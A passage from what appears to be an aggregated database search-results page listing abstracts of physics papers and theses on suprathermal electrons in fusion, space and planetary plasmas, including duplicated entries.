and coronal holes. Furthermore, we see that what would have been interpreted as a mean Doppler drift velocity for a Maxwellian plasma is actually a shift of the Doppler frequency of the plasma lines due to suprathermal electrons.Key words. Ionosphere (electric fields and currents; solar radiation and cosmic ray effects 18. Ignition and burn propagation with suprathermal electron auxiliary heating International Nuclear Information System (INIS) Han Shensheng; Wu Yanqing 2000-01-01 The rapid development in ultrahigh-intensity lasers has allowed the exploration of applying an auxiliary heating technique in inertial confinement fusion (ICF) research. It is hoped that, compared with the 'standard fast ignition' scheme, raising the temperature of a hot-spot over the ignition threshold based on the shock-heated temperature will greatly reduce the required output energy of an ignition ultrahigh-intensity pulse. One of the key issues in ICF auxiliary heating is: how can we transport the exogenous energy efficiently into the hot-spot of compressed DT fuel? A scheme is proposed with three phases. First, a partial-spherical-shell capsule, such as double-conical target, is imploded as in the conventional approach to inertial fusion to assemble a high-density fuel configuration with a hot-spot of temperature lower than the ignition threshold. Second, a hole is bored through the shell outside the hot-spot by suprathermal electron explosion boring. Finally, the fuel is ignited by suprathermal electrons produced in the high-intensity ignition laser-plasma interactions. Calculations with a simple hybrid model show that the new scheme can possibly lead to ignition and burn propagation with a total drive energy of a few tens of kilojoules and an output energy as low as hundreds of joules for a single ignition ultrahigh-intensity pulse. (author) 19. Electron cyclotron heating and supra-thermal electron dynamics in the TCV Tokamak Energy Technology Data Exchange (ETDEWEB) Gnesin, S. 2011-10-15 This thesis is concerned with the physics of supra-thermal electrons in thermonuclear, magnetically confined plasmas. Under a variety of conditions, in laboratory as well as space plasmas, the electron velocity distribution function is not in thermodynamic equilibrium owing to internal or external drives. Accordingly, the distribution function departs from the equilibrium Maxwellian, and in particular generally develops a high-energy tail. In tokamak plasmas, this occurs especially as a result of injection of high-power electromagnetic waves, used for heating and current drive, as well as a result of internal magnetohydrodynamic (MHD) instabilities. The physics of these phenomena is intimately tied to the properties and dynamics of this supra-thermal electron population. This motivates the development of instrumental apparatus to measure its properties as well as of numerical codes to simulate their dynamics. Both aspects are reflected in this thesis work, which features advanced instrumental development and experimental measurements as well as numerical modeling. The instrumental development consisted of the complete design of a spectroscopic and tomographic system of four multi-detector hard X-ray (HXR) cameras for the TCV tokamak. The goal is to measure bremsstrahlung emission from supra-thermal electrons with energies in the 10-300 keV range, with the ultimate aim of providing the first full tomographic reconstruction at these energies in a noncircular plasma. In particular, supra-thermal electrons are generated in TCV by a high-power electron cyclotron heating (ECH) system and are also observed in the presence of MHD events, such as sawtooth oscillations and disruptive instabilities. This diagnostic employs state-of-the-art solid-state detectors and is optimized for the tight space requirements of the TCV ports. It features a novel collimator concept that combines compactness and flexibility as well as full digital acquisition of the photon pulses, greatly 20. Electron cyclotron heating and supra-thermal electron dynamics in the TCV Tokamak International Nuclear Information System (INIS) Gnesin, S. 2011-10-01 This thesis is concerned with the physics of supra-thermal electrons in thermonuclear, magnetically confined plasmas. Under a variety of conditions, in laboratory as well as space plasmas, the electron velocity distribution function is not in thermodynamic equilibrium owing to internal or external drives. Accordingly, the distribution function departs from the equilibrium Maxwellian, and in particular generally develops a high-energy tail. In tokamak plasmas, this occurs especially as a result of injection of high-power electromagnetic waves, used for heating and current drive, as well as a result of internal magnetohydrodynamic (MHD) instabilities. The physics of these phenomena is intimately tied to the properties and dynamics of this supra-thermal electron population. This motivates the development of instrumental apparatus to measure its properties as well as of numerical codes to simulate their dynamics. Both aspects are reflected in this thesis work, which features advanced instrumental development and experimental measurements as well as numerical modeling. The instrumental development consisted of the complete design of a spectroscopic and tomographic system of four multi-detector hard X-ray (HXR) cameras for the TCV tokamak. The goal is to measure bremsstrahlung emission from supra-thermal electrons with energies in the 10-300 keV range, with the ultimate aim of providing the first full tomographic reconstruction at these energies in a noncircular plasma. In particular, supra-thermal electrons are generated in TCV by a high-power electron cyclotron heating (ECH) system and are also observed in the presence of MHD events, such as sawtooth oscillations and disruptive instabilities. This diagnostic employs state-of-the-art solid-state detectors and is optimized for the tight space requirements of the TCV ports. It features a novel collimator concept that combines compactness and flexibility as well as full digital acquisition of the photon pulses, greatly 1. Determination of the energy of suprathermal electrons during lower hybrid current drive on PBX-M International Nuclear Information System (INIS) von Goeler, S.; Bernabei, S.; Davis, W.; Ignat, D.; Kaita, R.; Roney, P.; Stevens, J.; Post-Zwicker, A. 1993-06-01 Suprathermal electrons are diagnosed by a hard x-ray pinhole camera during lower hybrid current drive on PBX-M. The experimental hard x-ray images are compared with simulated images, which result from an integration of the relativistic bremsstrahlung along lines-of-sight through the bean-shaped plasma. Images with centrally peaked and radially hollow radiation profiles are easily distinguished. The energy distribution of the suprathermal electrons is analyzed by comparing images taken with different absorber foils. An effective photon temperature is derived from the experimental images, and a comparison with simulated photon temperatures yields the energy of the suprathermal electrons. The analysis indicates that the energy of the suprathermal electrons in the hollow discharges is in the 50 to 100 key range in the center of the discharge. There seems to exist a very small higher energy component close to the plasma edge 2. Interaction of suprathermal solar wind electron fluxes with sheared whistler waves: fan instability Directory of Open Access Journals (Sweden) C. Krafft Full Text Available Several in situ measurements performed in the solar wind evidenced that solar type III radio bursts were some-times associated with locally excited Langmuir waves, high-energy electron fluxes and low-frequency electrostatic and electromagnetic waves; moreover, in some cases, the simultaneous identification of energetic electron fluxes, Langmuir and whistler waves was performed. This paper shows how whistlers can be excited in the disturbed solar wind through the so-called "fan instability" by interacting with energetic electrons at the anomalous Doppler resonance. This instability process, which is driven by the anisotropy in the energetic electron velocity distribution along the ambient magnetic field, does not require any positive slope in the suprathermal electron tail and thus can account for physical situations where plateaued reduced electron velocity distributions were observed in solar wind plasmas in association with Langmuir and whistler waves. Owing to linear calculations of growth rates, we show that for disturbed solar wind conditions (that is, when suprathermal particle fluxes propagate along the ambient magnetic field, the fan instability can excite VLF waves (whistlers and lower hybrid waves with characteristics close to those observed in space experiments. Key words. Space plasma physics (waves and instabilities – Radio Science (waves in plasma – Solar physics, astrophysics and astronomy (radio emissions 3. Interaction of suprathermal solar wind electron fluxes with sheared whistler waves: fan instability Directory of Open Access Journals (Sweden) C. Krafft 2003-07-01 Full Text Available Several in situ measurements performed in the solar wind evidenced that solar type III radio bursts were some-times associated with locally excited Langmuir waves, high-energy electron fluxes and low-frequency electrostatic and electromagnetic waves; moreover, in some cases, the simultaneous identification of energetic electron fluxes, Langmuir and whistler waves was performed. This paper shows how whistlers can be excited in the disturbed solar wind through the so-called "fan instability" by interacting with energetic electrons at the anomalous Doppler resonance. This instability process, which is driven by the anisotropy in the energetic electron velocity distribution along the ambient magnetic field, does not require any positive slope in the suprathermal electron tail and thus can account for physical situations where plateaued reduced electron velocity distributions were observed in solar wind plasmas in association with Langmuir and whistler waves. Owing to linear calculations of growth rates, we show that for disturbed solar wind conditions (that is, when suprathermal particle fluxes propagate along the ambient magnetic field, the fan instability can excite VLF waves (whistlers and lower hybrid waves with characteristics close to those observed in space experiments.Key words. Space plasma physics (waves and instabilities – Radio Science (waves in plasma – Solar physics, astrophysics and astronomy (radio emissions 4. 5-D simulation study of suprathermal electron transport in non-axisymmetric plasmas International Nuclear Information System (INIS) Murakami, S.; Idei, H.; Kubo, S.; Nakajima, N.; Okamoto, M.; Gasparino, U.; Maassberg, H.; Rome, M.; Marushchenko, N. 2000-01-01 ECRH driven transport of suprathermal electrons is studied in non-axisymmetric plasmas using a new Monte Carlo simulation technique in 5-D phase space. Two different phases of the ECRH driven transport of suprathermal electrons can be seen. The first is a rapid convective phase due to the direct radial motion of trapped electrons and the second is a slower phase due to the collisional transport. The important role of the radial transport of suprathermal electrons in the broadening of the ECRH deposition profile in W7-AS is clarified. The ECRH driven flux is also evaluated and considered in relation to the 'electron root' feature recently observed in W7-AS. It is found that, at low collisionalities, the ECRH driven flux due to the suprathermal electrons can play a dominant role in the condition of ambipolarity, and thus the observed electron root feature in W7-AS is thought to be driven by the radial (convective) flux of ECRH generated suprathermal electrons. A possible scenario for this type of electron root is considered for the LHD plasma. (author) 5. 5D simulation study of suprathermal electron transport in non-axisymmetric plasmas International Nuclear Information System (INIS) Murakami, S.; Idei, H.; Kubo, S.; Nakajima, N.; Okamoto, M.; Gasparino, U.; Maassberg, H.; Rome, M.; Marushchenko, N. 1999-01-01 ECRH-driven transport of suprathermal electrons is studied in non-axisymmetric plasmas using a new Monte Carlo simulation technique in 5D phase space. Two different phases of the ECRH-driven transport of suprathermal electrons can be seen; one is a rapid convective phase due to the direct radial motion of trapped electrons and the other is a slower phase due to the collisional transport. The important role of the radial transport of suprathermal electrons in the broadening of the ECRH deposition profile is clarified in W7-AS. The ECRH driven flux is also evaluated and put in relation with the 'electron root' feature recently observed in W7-AS. It is found that, at low collisionalities, the ECRH driven flux due to the suprathermal electrons can play a dominant role in the condition of ambipolarity and, thus, the observed 'electron root' feature in W7-AS is thought to be driven by the radial (convective) flux of ECRH generated suprathermal electrons. The possible scenario of this 'ECRH-driven electron root' is considered in the LHD plasma. (author) 6. Investigation of the role of electron cyclotron resonance heating and magnetic configuration on the suprathermal ion population in the stellarator TJ-II using a luminescent probe Science.gov (United States) Martínez, M.; Zurro, B.; Baciero, A.; Jiménez-Rey, D.; Tribaldos, V. 2018-02-01 Numerous observation exist of a population of high energetic ions with energies well above the corresponding thermal values in plasmas generated by electron cyclotron resonance (ECR) heating in TJ-II stellarator and in other magnetically confined plasmas devices. In this work we study the impact of ECR heating different conditions (positions and powers) on fast ions escaping from plasmas in the TJ-II stellarator. For this study, an ion luminescent probe operated in counting mode is used to measure the energy distribution of suprathermal ions, in the range from 1 to 30 keV. It is observed that some suprathermal ions characteristics (such as temperature, particle and energy fluxes) are related directly with the gyrotron power and focus position of the heating beam in the plasma. Moreover, it is found that suprathermal ion characteristics vary during a magnetic configuration scan (performed along a single discharge). By investigating the suprathermal ions escaping from plasmas generated using two gyrotrons, one with fixed power and the other modulated (on/off) at low frequency (10 Hz), the de-confinement time of the suprathermal ions can be measured, which is of the order of a few milliseconds (power balance is used to understand the de-confinement times in terms of the interaction of suprathermal ions and plasma components. This model also can be used to interpret experimental results of energy loss due to suprathermal ions. Finally, observations of increases (peaks) in the population of escaping suprathermal ions, which are well localized at discrete energies, is documented, these peaks being observed in the energy distributions along a discharge. 7. 5D simulation study of suprathermal electron transport in non-axisymmetric plasmas International Nuclear Information System (INIS) Murakami, S.; Idei, H.; Kubo, S.; Nakajima, N.; Okamoto, M.; Gasparino, U.; Maassberg, H.; Rome, M.; Marushchenko, N. 2001-01-01 ECRH-driven transport of is studied in using a new Monte Carlo simulation technique in 5D phase space. Two different phases of the ECRH-driven transport of suprathermal electrons can be seen; one is a rapid convective phase due to the direct radial motion of trapped electrons and the other is a slower phase due to the collisional transport. The important role of the radial transport of suprathermal electrons in the broadening of the ECRH deposition profile is clarified in W7-AS. The ECRH driven flux is also evaluated and put in relation with the ''electron root'' feature recently observed in W7-AS. It is found that, at low collisionalities, the ECRH driven flux due to the suprathermal electrons can play a dominant role in the condition of ambipolarity and, thus, the observed ''electron root'' feature in W7-AS is thought to be driven by the radial (convective) flux of ECRH generated suprathermal electrons. The possible scenario of this ''ECRH-driven electron root'' is considered in the LHD plasma. (author) 8. SUPRATHERMAL ELECTRONS IN THE SOLAR CORONA: CAN NONLOCAL TRANSPORT EXPLAIN HELIOSPHERIC CHARGE STATES? International Nuclear Information System (INIS) Cranmer, Steven R. 2014-01-01 There have been several ideas proposed to explain how the Sun's corona is heated and how the solar wind is accelerated. Some models assume that open magnetic field lines are heated by Alfvén waves driven by photospheric motions and dissipated after undergoing a turbulent cascade. Other models posit that much of the solar wind's mass and energy is injected via magnetic reconnection from closed coronal loops. The latter idea is motivated by observations of reconnecting jets and also by similarities of ion composition between closed loops and the slow wind. Wave/turbulence models have also succeeded in reproducing observed trends in ion composition signatures versus wind speed. However, the absolute values of the charge-state ratios predicted by those models tended to be too low in comparison with observations. This Letter refines these predictions by taking better account of weak Coulomb collisions for coronal electrons, whose thermodynamic properties determine the ion charge states in the low corona. A perturbative description of nonlocal electron transport is applied to an existing set of wave/turbulence models. The resulting electron velocity distributions in the low corona exhibit mild suprathermal tails characterized by ''kappa'' exponents between 10 and 25. These suprathermal electrons are found to be sufficiently energetic to enhance the charge states of oxygen ions, while maintaining the same relative trend with wind speed that was found when the distribution was assumed to be Maxwellian. The updated wave/turbulence models are in excellent agreement with solar wind ion composition measurements 9. Study of the thermal and suprathermal electron density fluctuations of the plasma in the Focus experiment International Nuclear Information System (INIS) Jolas, A. 1981-10-01 An experiment on Thomson scattering of ruby laser light by the electrons of a plasma produced by an intense discharge between the electrodes of a coaxial gun in a gas at low pressure has been carried out. It is shown that the imploding plasma is made up of layers with different characteristics: a dense plasma layer where the density fluctuations are isotropic and have a thermal level, and a tenuous plasma layer where the fluctuations are anisotropic, and strongly suprathermal. The suprathermal fluctuations are attributed to microscopic instabilities generated by the electric current circulating in the transition zone where the magnetic field penetrates the plasma [fr 10. Electron beam-plasma interaction and electron-acoustic solitary waves in a plasma with suprathermal electrons Science.gov (United States) Danehkar, A. 2018-06-01 Suprathermal electrons and inertial drifting electrons, so called electron beam, are crucial to the nonlinear dynamics of electrostatic solitary waves observed in several astrophysical plasmas. In this paper, the propagation of electron-acoustic solitary waves (EAWs) is investigated in a collisionless, unmagnetized plasma consisting of cool inertial background electrons, hot suprathermal electrons (modeled by a κ-type distribution), and stationary ions. The plasma is penetrated by a cool electron beam component. A linear dispersion relation is derived to describe small-amplitude wave structures that shows a weak dependence of the phase speed on the electron beam velocity and density. A (Sagdeev-type) pseudopotential approach is employed to obtain the existence domain of large-amplitude solitary waves, and investigate how their nonlinear structures depend on the kinematic and physical properties of the electron beam and the suprathermality (described by κ) of the hot electrons. The results indicate that the electron beam can largely alter the EAWs, but can only produce negative polarity solitary waves in this model. While the electron beam co-propagates with the solitary waves, the soliton existence domain (Mach number range) becomes narrower (nearly down to nil) with increasing the beam speed and the beam-to-hot electron temperature ratio, and decreasing the beam-to-cool electron density ratio in high suprathermality (low κ). It is found that the electric potential amplitude largely declines with increasing the beam speed and the beam-to-cool electron density ratio for co-propagating solitary waves, but is slightly decreased by raising the beam-to-hot electron temperature ratio. 11. SUPRATHERMAL ELECTRONS IN TITAN’S SUNLIT IONOSPHERE: MODEL–OBSERVATION COMPARISONS Energy Technology Data Exchange (ETDEWEB) Vigren, E.; Edberg, N. J. T.; Wahlund, J.-E. [Swedish Institute of Space Physics, Uppsala (Sweden); Galand, M.; Sagnières, L. [Department of Physics, Imperial College London, London SW7 2AZ (United Kingdom); Wellbrock, A.; Coates, A. J. [Mullard Space Science Laboratory, University College London, Dorking, Surrey RH5 6NT (United Kingdom); Cui, J. [National Astronomical Observatories, Chinese Academy of Sciences, Beijing 100012 (China); Lavvas, P. [Université Reims Champagne-Ardenne, Reims (France); Snowden, D. [Department of Physics, Central Washington University, Ellensburg, WA 98926 (United States); Vuitton, V., E-mail: [email protected] [Univ. Grenoble Alpes, CNRS, IPAG, Grenoble (France) 2016-08-01 The dayside ionosphere of the Saturnian satellite Titan is generated mainly from photoionization of N{sub 2} and CH{sub 4}. We compare model-derived suprathermal electron intensities with spectra measured by the Cassini Plasma Spectrometer/Electron Spectrometer (CAPS/ELS) in Titan's sunlit ionosphere (altitudes of 970–1250 km) focusing on the T40, T41, T42, and T48 Titan flybys by the Cassini spacecraft. The model accounts only for photoelectrons and associated secondary electrons, with a main input being the impinging solar EUV spectra as measured by the Thermosphere Ionosphere Mesosphere Energy and Dynamics/Solar EUV Experiment and extrapolated to Saturn. Associated electron-impact electron production rates have been derived from ambient number densities of N{sub 2} and CH{sub 4} (measured by the Ion Neutral Mass Spectrometer/Closed Source Neutral mode) and related energy-dependent electron-impact ionization cross sections. When integrating up to electron energies of 60 eV, covering the bulk of the photoelectrons, the model-based values exceed the observationally based values typically by factors of ∼3 ± 1. This finding is possibly related to current difficulties in accurately reproducing the observed electron number densities in Titan's dayside ionosphere. We compare the utilized dayside CAPS/ELS spectra with ones measured in Titan's nightside ionosphere during the T55–T59 flybys. The investigated nightside locations were associated with higher fluxes of high-energy (>100 eV) electrons than the dayside locations. As expected, for similar neutral number densities, electrons with energies <60 eV give a higher relative contribution to the total electron-impact ionization rates on the dayside (due to the contribution from photoelectrons) than on the nightside. 12. Shaping the solar wind electron temperature anisotropy by the interplay of core and suprathermal populations Science.gov (United States) Shaaban Hamd, S. M.; Lazar, M.; Poedts, S.; Pierrard, V.; Štverák 2017-12-01 We present the results of an advanced parametrization of the temperature anisotropy of electrons in the slow solar wind and the electromagnetic instabilities resulting from the interplay of their thermal core and suprathermal halo populations. A large set of observational data (from the Ulysses, Helios and Cluster missions) is used to parametrize these components and establish their correlations. Comparative analysis demonstrates for the first time a particular implication of the suprathermal electrons which are less dense but hotter than thermal electrons. The instabilities are significantly stimulated by the interplay of the core and halo populations, leading to lower thresholds which shape the observed limits of the temperature anisotropy for both the core and halo populations. This double agreement strongly suggests that the selfgenerated instabilities play the major role in constraining the electron anisotropy. 13. Microwave heating and diagnostic of suprathermal electrons in an overdense stellarator plasma International Nuclear Information System (INIS) Stange, Torsten 2014-01-01 The resonant coupling of microwaves into a magnetically confined plasma is one of the fundamental methods for the heating of such plasmas. Identifying and understanding the processes of the heating of overdense plasmas, in which the wave propagation is generally not possible because the wave frequency is below the plasma frequency, is becoming increasingly important for high density fusion plasmas. This work focuses on the heating of overdense plasmas in the WEGA stellarator. The excitation of electron Bernstein waves, utilizing the OXB-conversion process, provides a mechanism for the wave to reach the otherwise not accessible resonant absorption layer. In WEGA these OXB-heated plasmas exhibit a suprathermal electron component with energies up to 80 keV. The fast electrons are located in the plasma center and have a Maxwellian energy distribution function within the soft X-ray related energy range. The corresponding averaged energy is a few keV. The OXB-discharges are accompanied by a broadband microwave radiation spectrum with radiation temperatures of the order of keV. Its source was identified as a parametric decay of the heating wave and has no connection to the suprathermal electron component. For the detailed investigation of the microwave emission, a quasioptical mirror system, optimized for the OX-conversion, has been installed. Based on the measurement of the broadband microwave stray radiation of the decay process, the OX-conversion efficiency has been determined to 0.56 being in good agreement with full-wave calculations. In plasmas without an electron cyclotron resonance, corresponding to the wave frequency used, non-resonant heating mechanisms have been identified in the overdense plasma regions. Whistler waves or R-like waves are the only propagable wave types within the overdense plasmas. The analysis of the heating efficiency in dependence on the magnetic flux density leads to tunneling as the most probable coupling mechanism. For the determination 14. Suprathermal electron loss cone distributions in the solar wind: Ulysses observations International Nuclear Information System (INIS) Phillips, J. L.; Feldman, W. C.; Gosling, J. T.; Hammond, C. M.; Forsyth, R. J. 1996-01-01 We present observations by the Ulysses solar wind plasma experiment of a new class of suprathermal electron signatures. At low solar latitudes and heliocentric distances beyond 3.37 AU Ulysses encountered seven intervals, ranging in duration from 1 hour to 22 hours, in which the suprathermal distributions included an antisunward field-aligned beam and a return population with a flux dropout typically spanning ±60 deg. from the sunward field-aligned direction. All events occurred between the forward and reverse shocks or waves bounding corotating interaction regions (CIRs). The observations support a scenario in which the sunward-moving electrons result from reflection of the prevailing antisunward field-aligned beam at magnetic field compressions downstream from the spacecraft, with wide loss cones caused by the relatively weak mirror ratio. This hypothesis requires that the field magnitude within the CIRs actually increased locally with increasing field-aligned distance from the Sun 15. Generation of suprathermal electrons during plasma current startup by lower hybrid waves in a tokamak International Nuclear Information System (INIS) Ohkubo, K.; Toi, K.; Kawahata, K. 1984-10-01 Suprathermal electrons which carry a seed current are generated by non-resonant parametric decay instability during initial phase of lower hybrid current startup in the JIPP T-IIU tokamak. From the numerical analysis, it is found that parametrically excited lower hybrid waves at lower side band can bridge the spectral gap between the thermal velocity and the low velocity end in the pump power spectrum. (author) 16. QUIET-TIME SUPRATHERMAL (∼0.1–1.5 keV) ELECTRONS IN THE SOLAR WIND Energy Technology Data Exchange (ETDEWEB) Tao, Jiawei; Wang, Linghua; Zong, Qiugang; He, Jiansen; Tu, Chuanyi [School of Earth and Space Science, Peking University, Beijing 100871 (China); Li, Gang [Department of Physics and CSPAR, University of Alabama in Huntsville, Alabama 35899 (United States); Salem, Chadi S.; Bale, Stuart D. [Space Sciences Laboratory, University of California, Berkeley, CA 94720 (United States); Wimmer-Schweingruber, Robert F., E-mail: [email protected] [Institute for Experimental and Applied Physics, University of Kiel, Leibnizstrasse 11, D-24118 Kiel (Germany) 2016-03-20 We present a statistical survey of the energy spectrum of solar wind suprathermal (∼0.1–1.5 keV) electrons measured by the WIND 3DP instrument at 1 AU during quiet times at the minimum and maximum of solar cycles 23 and 24. After separating (beaming) strahl electrons from (isotropic) halo electrons according to their different behaviors in the angular distribution, we fit the observed energy spectrum of both strahl and halo electrons at ∼0.1–1.5 keV to a Kappa distribution function with an index κ and effective temperature T{sub eff}. We also calculate the number density n and average energy E{sub avg} of strahl and halo electrons by integrating the electron measurements between ∼0.1 and 1.5 keV. We find a strong positive correlation between κ and T{sub eff} for both strahl and halo electrons, and a strong positive correlation between the strahl n and halo n, likely reflecting the nature of the generation of these suprathermal electrons. In both solar cycles, κ is larger at solar minimum than at solar maximum for both strahl and halo electrons. The halo κ is generally smaller than the strahl κ (except during the solar minimum of cycle 23). The strahl n is larger at solar maximum, but the halo n shows no difference between solar minimum and maximum. Both the strahl n and halo n have no clear association with the solar wind core population, but the density ratio between the strahl and halo roughly anti-correlates (correlates) with the solar wind density (velocity) 17. Quiet-time Suprathermal (~0.1-1.5 keV) Electrons in the Solar Wind Science.gov (United States) Tao, Jiawei; Wang, Linghua; Zong, Qiugang; Li, Gang; Salem, Chadi S.; Wimmer-Schweingruber, Robert F.; He, Jiansen; Tu, Chuanyi; Bale, Stuart D. 2016-03-01 We present a statistical survey of the energy spectrum of solar wind suprathermal (˜0.1-1.5 keV) electrons measured by the WIND 3DP instrument at 1 AU during quiet times at the minimum and maximum of solar cycles 23 and 24. After separating (beaming) strahl electrons from (isotropic) halo electrons according to their different behaviors in the angular distribution, we fit the observed energy spectrum of both strahl and halo electrons at ˜0.1-1.5 keV to a Kappa distribution function with an index κ and effective temperature Teff. We also calculate the number density n and average energy Eavg of strahl and halo electrons by integrating the electron measurements between ˜0.1 and 1.5 keV. We find a strong positive correlation between κ and Teff for both strahl and halo electrons, and a strong positive correlation between the strahl n and halo n, likely reflecting the nature of the generation of these suprathermal electrons. In both solar cycles, κ is larger at solar minimum than at solar maximum for both strahl and halo electrons. The halo κ is generally smaller than the strahl κ (except during the solar minimum of cycle 23). The strahl n is larger at solar maximum, but the halo n shows no difference between solar minimum and maximum. Both the strahl n and halo n have no clear association with the solar wind core population, but the density ratio between the strahl and halo roughly anti-correlates (correlates) with the solar wind density (velocity). 18. Statistics of counter-streaming solar wind suprathermal electrons at solar minimum: STEREO observations Directory of Open Access Journals (Sweden) B. Lavraud 2010-01-01 Full Text Available Previous work has shown that solar wind suprathermal electrons can display a number of features in terms of their anisotropy. Of importance is the occurrence of counter-streaming electron patterns, i.e., with "beams" both parallel and anti-parallel to the local magnetic field, which is believed to shed light on the heliospheric magnetic field topology. In the present study, we use STEREO data to obtain the statistical properties of counter-streaming suprathermal electrons (CSEs in the vicinity of corotating interaction regions (CIRs during the period March–December 2007. Because this period corresponds to a minimum of solar activity, the results are unrelated to the sampling of large-scale coronal mass ejections, which can lead to CSE owing to their closed magnetic field topology. The present study statistically confirms that CSEs are primarily the result of suprathermal electron leakage from the compressed CIR into the upstream regions with the combined occurrence of halo depletion at 90° pitch angle. The occurrence rate of CSE is found to be about 15–20% on average during the period analyzed (depending on the criteria used, but superposed epoch analysis demonstrates that CSEs are preferentially observed both before and after the passage of the stream interface (with peak occurrence rate >35% in the trailing high speed stream, as well as both inside and outside CIRs. The results quantitatively show that CSEs are common in the solar wind during solar minimum, but yet they suggest that such distributions would be much more common if pitch angle scattering were absent. We further argue that (1 the formation of shocks contributes to the occurrence of enhanced counter-streaming sunward-directed fluxes, but does not appear to be a necessary condition, and (2 that the presence of small-scale transients with closed-field topologies likely also contributes to the occurrence of counter-streaming patterns, but only in the slow solar wind prior to 19. Study of profile control and suprathermal electron production with lower hybrid waves International Nuclear Information System (INIS) Soeldner, F.X.; Brambilla, M.; Leuterer, F.; Muenich, M. 1986-05-01 In this study the coupling of LH waves to suprathermal electrons, the LH current drive efficiency and the mechanism for sawtooth stabilisation will be discussed. A wide data base has been obtained by the LH experiments on Alcator C, ASDEX, FT; JFT-2M, JIPPT-IIU, Petula, PLT, Versator, WT II during the last years and important aspects as the scaling of global current drive efficiency are satisfactorily described by theory. We mainly rely here on experimental results from ASDEX and comparison with theoretical calculations by Fisch and Karney. (orig.) 20. Observation of suprathermal electron fluxes during ionospheric modification experiments International Nuclear Information System (INIS) Fejer, J.A.; Sulzer, M.P. 1987-01-01 The temporal behavior of backscatter by ionospheric Langmuir waves was observed with the 430-MHz radar at Arecibo while a powerful HF wave was cycled 2 s on, 3 s off. The time resolution was 0.1 s. Late at night, in the absence of photoelectrons, using an HF equivalent radiated power of 80 MW at 3.175 MHz, the initial enhancement of about 6% above system noise of the backscattered power with Doppler shifts between -3.75 and -3.85 MHz was reached about 0.25 s after switching on the HF transmitter. In the following second the enhancement gradually decreased to about 3% and remained there until switching off. During the late afternoon, in the presence of photoelectrons, using the same HF power at 5.1 MHz, an initial enhancement by 25% of the backscattered power with Doppler shifts between -5.25 and -5.35 MHz appeared within less than 0.1 s after switching on the HF transmitter. The incoherent backscatter by Langmuir waves enhanced by photoelectrons was already above system noise by a factor greatly in excess of 10 before switching on the HF transmitter; the 25% enhancement thus corresponds to an enhancement greatly in excess of 250% above system noise. The enhancement drops to less than one tenth of its original value in less than a second. The nighttime effect is attributed to multiple acceleration of electrons from the high-energy tail of the Maxwellian distribution. The daytime effect is believed to be due to a modification in the distribution function of photoelectrons 1. Nonlinear dust acoustic waves in a charge varying dusty plasma with suprathermal electrons International Nuclear Information System (INIS) Tribeche, Mouloud; Bacha, Mustapha 2010-01-01 Arbitrary amplitude dust acoustic waves in a dusty plasma with a high-energy-tail electron distribution are investigated. The effects of charge variation and electron deviation from the Boltzmann distribution on the dust acoustic soliton are then considered. The dust charge variation makes the dust acoustic soliton more spiky. The dust grain surface collects less electrons as the latter evolves far away from their thermodynamic equilibrium. The dust accumulation caused by a balance of the electrostatic forces acting on the dust grains is more effective for lower values of the electron spectral index. Under certain conditions, the dust charge fluctuation may provide an alternate physical mechanism causing anomalous dissipation, the strength of which becomes important and may prevail over that of dispersion as the suprathermal character of the plasma becomes important. Our results may explain the strong spiky waveforms observed in auroral plasmas. 2. Suprathermal Electron Generation and Channel Formation by an Ultrarelativistic Laser Pulse in an Underdense Preformed Plasma International Nuclear Information System (INIS) Malka, G.; Gaillard, R.; Miquel, J.L.; Rousseaux, C.; Bonnaud, G.; Busquet, M.; Lours, L.; Fuchs, J.; Pepin, H.; Fuchs, J.; Amiranoff, F.; Baton, S.D. 1997-01-01 Relativistic electrons are produced, with energies up to 20MeV, by the interaction of a high-intensity subpicosecond laser pulse (1 μm , 300 fs , 10 19 W/cm 2 ) with an underdense plasma. Two suprathermal electron populations appear with temperatures of 1 and 3MeV. In the same conditions, the laser beam transmission is increased up to 20% 30%. We observe both features along with the evidence of laser pulse channeling. A fluid model predicts a strong self-focusing of the pulse. Acceleration in the enhanced laser field seems the most likely mechanism leading to the second electron population. copyright 1997 The American Physical Society 3. Suprathermal electron environment of comet 67P/Churyumov-Gerasimenko: Observations from the Rosetta Ion and Electron Sensor Science.gov (United States) Clark, G.; Broiles, T. W.; Burch, J. L.; Collinson, G. A.; Cravens, T.; Frahm, R. A.; Goldstein, J.; Goldstein, R.; Mandt, K.; Mokashi, P.; Samara, M.; Pollock, C. J. 2015-11-01 Context. The Rosetta spacecraft is currently escorting comet 67P/Churyumov-Gerasimenko until its perihelion approach at 1.2 AU. This mission has provided unprecedented views into the interaction of the solar wind and the comet as a function of heliocentric distance. Aims: We study the interaction of the solar wind and comet at large heliocentric distances (>2 AU) using data from the Rosetta Plasma Consortium Ion and Electron Sensor (RPC-IES). From this we gain insight into the suprathermal electron distribution, which plays an important role in electron-neutral chemistry and dust grain charging. Methods: Electron velocity distribution functions observed by IES fit to functions used to previously characterize the suprathermal electrons at comets and interplanetary shocks. We used the fitting results and searched for trends as a function of cometocentric and heliocentric distance. Results: We find that interaction of the solar wind with this comet is highly turbulent and stronger than expected based on historical studies, especially for this weakly outgassing comet. The presence of highly dynamical suprathermal electrons is consistent with observations of comets (e.g., Giacobinni-Zinner, Grigg-Skjellerup) near 1 AU with higher outgassing rates. However, comet 67P/Churyumov-Gerasimenko is much farther from the Sun and appears to lack an upstream bow shock. Conclusions: The mass loading process, which likely is the cause of these processes, plays a stronger role at large distances from the Sun than previously expected. We discuss the possible mechanisms that most likely are responsible for this acceleration: heating by waves generated by the pick-up ion instability, and the admixture of cometary photoelectrons. 4. Statistical analysis of suprathermal electron drivers at 67P/Churyumov-Gerasimenko Science.gov (United States) Broiles, Thomas W.; Burch, J. L.; Chae, K.; Clark, G.; Cravens, T. E.; Eriksson, A.; Fuselier, S. A.; Frahm, R. A.; Gasc, S.; Goldstein, R.; Henri, P.; Koenders, C.; Livadiotis, G.; Mandt, K. E.; Mokashi, P.; Nemeth, Z.; Odelstad, E.; Rubin, M.; Samara, M. 2016-11-01 We use observations from the Ion and Electron Sensor (IES) on board the Rosetta spacecraft to study the relationship between the cometary suprathermal electrons and the drivers that affect their density and temperature. We fit the IES electron observations with the summation of two kappa distributions, which we characterize as a dense and warm population (˜10 cm-3 and ˜16 eV) and a rarefied and hot population (˜0.01 cm-3 and ˜43 eV). The parameters of our fitting technique determine the populations' density, temperature, and invariant kappa index. We focus our analysis on the warm population to determine its origin by comparing the density and temperature with the neutral density and magnetic field strength. We find that the warm electron population is actually two separate sub-populations: electron distributions with temperatures above 8.6 eV and electron distributions with temperatures below 8.6 eV. The two sub-populations have different relationships between their density and temperature. Moreover, the two sub-populations are affected by different 